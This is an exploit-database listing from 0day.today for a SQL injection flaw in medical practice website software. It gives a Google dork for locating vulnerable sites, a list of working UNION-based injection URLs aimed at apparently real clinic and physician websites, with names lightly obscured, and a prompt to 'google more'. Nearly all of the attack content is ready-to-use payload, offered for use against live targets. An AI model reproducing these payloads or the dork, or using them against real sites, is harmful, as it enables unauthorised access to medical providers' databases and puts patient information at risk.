[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Medical Website Design SQL Injection Vulnerability

Author
Ashiyane
Risk
[
Security Risk High
]
0day-ID
0day-ID-23932
Category
web applications
Date add
26-07-2015
Platform
php
######################
# Exploit Title : Medical Website Design SQL Injection Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.medicalpracticewebsitedesign.com/
# Google Dork : "Medical Practice Website Design" inurl:.php?newsid=
# Date: 2015-07-24
# Tested On : Win 7 / Mozilla Firefox
#
######################
#
# demos and explanations :
#
# http://www.georgXiavascularclinic.com/news-topic.php?newsid=-25%20%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.arundXelpediatrics.net/news-topic.php?newsid=-28%20%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.monXtgomerywomenshealth.com/news-topic.php?newsid=-25%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.ovieXdointernalmedicine.com/news-topic.php?newsid=-29%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://personalizXedcardiology.com/news-topic.php?newsid=-27%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.norXthatlantaprimarycare.com/news-topic.php?newsid=-84%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6--
# http://www.medXassocga.com/news-topic.php?newsid=-31%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.sd-Xneurosurgeon.com/news-topic.php?newsid=-16%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6--
# http://www.sspXinst.us/news-topic.php?newsid=-25%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6,7--
# http://www.nmmeXdicalgroup.com/news-topic.php?newsid=-13%20and+@x:=%28version%28%29%29+/*!00000union*/+SELECT+1,@x,3,4,5,6--
#
# and google more
#
######################
# discovered by : Naji
######################

#  0day.today [2024-12-25]  #